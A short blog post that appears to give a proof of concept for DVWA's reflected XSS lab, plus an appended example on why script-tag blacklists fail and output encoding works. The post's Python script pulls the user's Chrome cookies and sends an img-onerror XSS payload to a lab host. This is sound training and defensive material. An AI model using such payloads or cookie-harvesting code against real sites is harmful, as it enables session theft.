POC: DVWA's XSS Reflected
2022-07-17 05:03:00 【wavesky111】
In the reflected XSS module, all three levels only define filtering for the <script> tag, so a single <img> tag works against all of them.
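import requests
import browser_cookie3
from urllib import parse

# Reuse the logged-in DVWA session from the local Chrome cookie store
cookie = browser_cookie3.chrome()
text1 = '<img src=1 onerror=alert(document.cookie)>'
string1 = parse.quote(text1)
url = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/xss_r/?name=' + string1
response = requests.get(url=url, cookies=cookie)
# The page is only vulnerable if the tag comes back unescaped, so look for the
# whole payload; 'document.cookie' alone also appears in HTML-escaped output
flag = text1 in response.text
if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

There is no real need to URL-encode the request here; I just wanted to add it anyway.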
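An added example (not from the original post or from DVWA's source) showing why filters that only target the <script> tag leave the <img> payload intact while output encoding neutralises it, and why a test should look for the whole payload rather than a marker string. The filter functions, the page template and all function names are hypothetical stand-ins.

```python
import html
import re

# Payload quoted from the post; everything else here is constructed.
PAYLOAD = '<img src=1 onerror=alert(document.cookie)>'

def strip_script_literal(name):
    # Hypothetical blacklist: delete the exact string "<script>".
    return name.replace('<script>', '')

def strip_script_regex(name):
    # Hypothetical stricter blacklist: delete any <script ...> or </script> tag.
    return re.sub(r'<\s*/?\s*script[^>]*>', '', name, flags=re.IGNORECASE)

def encode_output(name):
    # Context-aware fix: HTML-encode on output (the idea behind PHP's
    # htmlspecialchars), so no tag of any kind survives.
    return html.escape(name, quote=True)

def render(name, sanitize):
    # Constructed stand-in for a page that echoes the "name" parameter.
    return '<pre>Hello ' + sanitize(name) + '</pre>'

def reflected_raw(body, payload=PAYLOAD):
    # True only when the payload comes back unchanged, i.e. as live markup.
    return payload in body

def marker_only(body, marker='document.cookie'):
    # Weaker check: the marker also survives HTML encoding.
    return marker in body

def audit():
    # Map each handler to (payload reflected raw?, marker present?).
    handlers = {
        'strip_literal': strip_script_literal,
        'strip_regex': strip_script_regex,
        'encode_output': encode_output,
    }
    results = {}
    for label, fn in handlers.items():
        body = render(PAYLOAD, fn)
        results[label] = (reflected_raw(body), marker_only(body))
    return results

if __name__ == '__main__':
    for label, (raw, marker) in audit().items():
        print(f'{label:14} raw_reflection={raw!s:5} marker_seen={marker}')
```

Only the encoded variant stops the raw reflection, yet the marker is present in all three responses, so a marker-only test would report a correctly encoded page as vulnerable.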